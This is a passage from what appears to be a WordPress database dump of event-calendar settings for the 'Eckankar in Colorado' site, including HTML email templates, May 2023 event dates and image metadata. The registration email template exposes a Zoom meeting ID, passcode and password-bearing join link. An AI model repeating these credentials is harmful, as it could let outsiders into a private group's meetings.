Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>834 9746 0655<br />\r\n<b>Passcode:</b> 867156</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:4801:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><strong><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><br />\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid rgba(201, 201, 207, 0.35); border-top-color: rgba(201, 201, 207, 0.35); border-right-color: rgba(201, 201, 207, 0.35); border-left-color: rgba(201, 201, 207, 0.35); text-align: left;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}}'),(192672,269143,'mec_fees_global_inheritance','1'),(192671,269143,'mec_tickets','a:0:{}'),(181698,268418,'_wp_attached_file','2023/04/BlueStarFamily.webp'),(181699,268418,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:27:\"2023/04/BlueStarFamily.webp\";s:8:\"filesize\";i:49986;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"BlueStarFamily-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:16812;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"BlueStarFamily-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9398;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:27:\"BlueStarFamily-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:27196;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:27:\"BlueStarFamily-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:43128;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:27:\"BlueStarFamily-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:31632;}s:8:\"tileview\";a:5:{s:4:\"file\";s:27:\"BlueStarFamily-300x338.webp\";s:5:\"width\";i:300;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:33600;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(181700,268419,'protect_children',''),(181701,268419,'mec_color',''),(181702,268419,'mec_location_id','187'),(181703,268419,'mec_dont_show_map','0'),(181704,268419,'mec_organizer_id','1'),(181705,268419,'mec_read_more',''),(181706,268419,'mec_more_info',''),(181707,268419,'mec_more_info_title',''),(181708,268419,'mec_more_info_target','_self'),(181709,268419,'mec_cost',''),(181710,268419,'mec_currency','a:0:{}'),(181711,268419,'mec_additional_organizer_ids','a:0:{}'),(181712,268419,'mec_additional_location_ids','a:0:{}'),(181713,268419,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-05-10\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-05-10\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(181714,268419,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(181715,268419,'mec_certain_weekdays','a:0:{}'),(181716,268419,'mec_allday','0'),(181717,268419,'one_occurrence','0'),(181718,268419,'mec_hide_time','0'),(181719,268419,'mec_hide_end_time','0'),(181720,268419,'mec_comment',''),(181721,268419,'mec_timezone','global'),(181722,268419,'mec_countdown_method','global'),(181723,268419,'mec_public','1'),(181724,268419,'mec_start_date','2023-05-10'),(181725,268419,'mec_start_time_hour','6'),(181726,268419,'mec_start_time_minutes','30'),(181727,268419,'mec_start_time_ampm','PM'),(181728,268419,'mec_start_day_seconds','66600'),(181729,268419,'mec_end_date','2023-05-10'),(181730,268419,'mec_end_time_hour','7'),(181731,268419,'mec_end_time_minutes','30'),(181732,268419,'mec_end_time_ampm','PM'),(181733,268419,'mec_end_day_seconds','70200'),(181734,268419,'mec_repeat_status','0'),(181735,268419,'mec_repeat_type',''),(181736,268419,'mec_repeat_interval','1'),(181737,268419,'mec_repeat_end',''),(181738,268419,'mec_repeat_end_at_occurrences',''),(181739,268419,'mec_repeat_end_at_date',''),(181740,268419,'mec_advanced_days','a:0:{}'),(181741,268419,'mec_in_days',''),(181742,268419,'mec_not_in_days',''),(181743,268419,'mec_hourly_schedules','a:0:{}'),(181744,268419,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(181745,268419,'mec_tickets','a:0:{}'),(181746,268419,'mec_fees_global_inheritance','1'),(181747,268419,'mec_fees','a:0:{}'),(181748,268419,'mec_ticket_variations_global_inheritance','1'),(181749,268419,'mec_ticket_variations','a:0:{}'),(181750,268419,'mec_reg_fields_global_inheritance','1'),(181751,268419,'mec_reg_fields','a:0:{}'),(181752,268419,'mec_bfixed_fields','a:0:{}'),(181753,268419,'mec_op','a:0:{}'),(181754,268419,'mec_fields','a:0:{}'),(181755,268419,'mec_event_status','EventScheduled'),(181756,268419,'mec_moved_online_link',''),(181757,268419,'mec_cancelled_reason',''),(181758,268419,'mec_display_cancellation_reason_in_single_page',''),(181759,268419,'boldgrid_hide_page_title','0'),(181760,268419,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(181761,268419,'passster_activate_global_protection',NULL),(181762,268419,'passster_activate_protection',NULL),(181763,268419,'passster_protection_type','password'),(181764,268419,'boldgrid_in_page_containers','1'),(181768,268419,'_dp_original','267696'),(181766,268419,'passster_area_shortcode',''),(181767,268419,'_wp_old_date','2023-01-14'),(181769,268419,'_edit_lock','1682294565:15'),(181770,268419,'_edit_last','15'),(181771,268419,'_thumbnail_id','266821'),(181772,268420,'protect_children',''),(181773,268420,'mec_color',''),(181774,268420,'mec_location_id','131'),(181775,268420,'mec_dont_show_map','0'),(181776,268420,'mec_organizer_id','1'),(181777,268420,'mec_read_more',''),(181778,268420,'mec_more_info',''),(181779,268420,'mec_more_info_title',''),(181780,268420,'mec_more_info_target','_self'),(181781,268420,'mec_cost',''),(181782,268420,'mec_currency','a:0:{}'),(181783,268420,'mec_additional_organizer_ids','a:0:{}'),(181784,268420,'mec_additional_location_ids','a:0:{}'),(181785,268420,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-05-14\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-05-14\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(181786,268420,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(181787,268420,'mec_certain_weekdays','a:0:{}'),(181788,268420,'mec_allday','0'),(181789,268420,'one_occurrence','0'),(181790,268420,'mec_hide_time','0'),(181791,268420,'mec_hide_end_time','0'),(181792,268420,'mec_comment',''),(181793,268420,'mec_timezone','global'),(181794,268420,'mec_countdown_method','global'),(181795,268420,'mec_public','1'),(181796,268420,'mec_start_date','2023-05-14'),(181797,268420,'mec_start_time_hour','1'),(181798,268420,'mec_start_time_minutes','0'),(181799,268420,'mec_start_time_ampm','PM'),(181800,268420,'mec_start_day_seconds','46800'),(181801,268420,'mec_end_date','2023-05-14'),(181802,268420,'mec_end_time_hour','2'),(181803,268420,'mec_end_time_minutes','30'),(181804,268420,'mec_end_time_ampm','PM'),(181805,268420,'mec_end_day_seconds','52200'),(181806,268420,'mec_repeat_status','0'),(181807,268420,'mec_repeat_type',''),(181808,268420,'mec_repeat_interval','1'),(181809,268420,'mec_repeat_end',''),(181810,268420,'mec_repeat_end_at_occurrences',''),(181811,268420,'mec_repeat_end_at_date',''),(181812,268420,'mec_advanced_days','a:0:{}'),(181813,268420,'mec_in_days',''),(181814,268420,'mec_not_in_days',''),(181815,268420,'mec_hourly_schedules','a:0:{}'),(181816,268420,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(181817,268420,'mec_tickets','a:0:{}'),(181818,268420,'mec_fees_global_inheritance','1'),(181819,268420,'mec_fees','a:0:{}'),(181820,268420,'mec_ticket_variations_global_inheritance','1'),(181821,268420,'mec_ticket_variations','a:0:{}'),(181822,268420,'mec_reg_fields_global_inheritance','1'),(181823,268420,'mec_reg_fields','a:0:{}'),(181824,268420,'mec_bfixed_fields','a:0:{}'),(181825,268420,'mec_op','a:0:{}'),(181826,268420,'mec_fields','a:0:{}'),(181827,268420,'mec_event_status','EventScheduled'),(181828,268420,'mec_moved_online_link',''),(181829,268420,'mec_cancelled_reason',''),(181830,268420,'mec_display_cancellation_reason_in_single_page',''),(181831,268420,'boldgrid_hide_page_title','0'),(181832,268420,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(181833,268420,'passster_activate_global_protection',NULL),(181834,268420,'passster_activate_protection',NULL),(181835,268420,'passster_protection_type','password'),(181836,268420,'boldgrid_in_page_containers','1'),(181837,268420,'passster_area_shortcode',''),(181838,268420,'_wp_old_date','2023-01-14'),(181841,268420,'_dp_original','268419'),(181840,268420,'_thumbnail_id','268421'),(181842,268420,'_edit_lock','1682294602:15'),(181843,268420,'_edit_last','15'),(181844,268421,'_wp_attached_file','2023/04/BlueArches.webp'),(181845,268421,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:23:\"2023/04/BlueArches.webp\";s:8:\"filesize\";i:15316;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"BlueArches-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6140;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"BlueArches-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4452;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:23:\"BlueArches-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:10258;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:23:\"BlueArches-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:14002;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:23:\"BlueArches-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:10576;}s:8:\"tileview\";a:5:{s:4:\"file\";s:23:\"BlueArches-300x338.webp\";s:5:\"width\";i:300;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12524;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(181846,268422,'protect_children',''),(181847,268422,'mec_color',''),(181848,268422,'mec_location_id','161'),(181849,268422,'mec_dont_show_map','0'),(181850,268422,'mec_organizer_id','1'),(181851,268422,'mec_read_more',''),(181852,268422,'mec_more_info',''),(181853,268422,'mec_more_info_title',''),(181854,268422,'mec_more_info_target','_self'),(181855,268422,'mec_cost',''),(181856,268422,'mec_currency','a:0:{}'),(181857,268422,'mec_additional_organizer_ids','a:0:{}'),(181858,268422,'mec_additional_location_ids','a:0:{}'),(181859,268422,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-05-07\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-05-07\";s:4:\"hour\";s:1:\"5\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(181860,268422,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(181861,268422,'mec_certain_weekdays','a:0:{}'),(181862,268422,'mec_allday','0'),(181863,268422,'one_occurrence','0'),(181864,268422,'mec_hide_time','0'),(181865,268422,'mec_hide_end_time','0'),(181866,268422,'mec_comment',''),(181867,268422,'mec_timezone','global'),(181868,268422,'mec_countdown_method','global'),(181869,268422,'mec_public','1'),(181870,268422,'mec_start_date','2023-05-07'),(181871,268422,'mec_start_time_hour','4'),(181872,268422,'mec_start_time_minutes','0'),(181873,268422,'mec_start_time_ampm','PM'),(181874,268422,'mec_start_day_seconds','57600'),(181875,268422,'mec_end_date','2023-05-07'),(181876,268422,'mec_end_time_hour','5'),(181877,268422,'mec_end_time_minutes','30'),(181878,268422,'mec_end_time_ampm','PM'),(181879,268422,'mec_end_day_seconds','63000'),(181880,268422,'mec_repeat_status','0'),(181881,268422,'mec_repeat_type',''),(181882,268422,'mec_repeat_interval','1'),(181883,268422,'mec_repeat_end',''),(181884,268422,'mec_repeat_end_at_occurrences',''),(181885,268422,'mec_repeat_end_at_date',''),(181886,268422,'mec_advanced_days','a:0:{}'),(181887,268422,'mec_in_days',''),(181888,268422,'mec_not_in_days',''),(181889,268422,'mec_hourly_schedules','a:0:{}'),(181890,268422,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"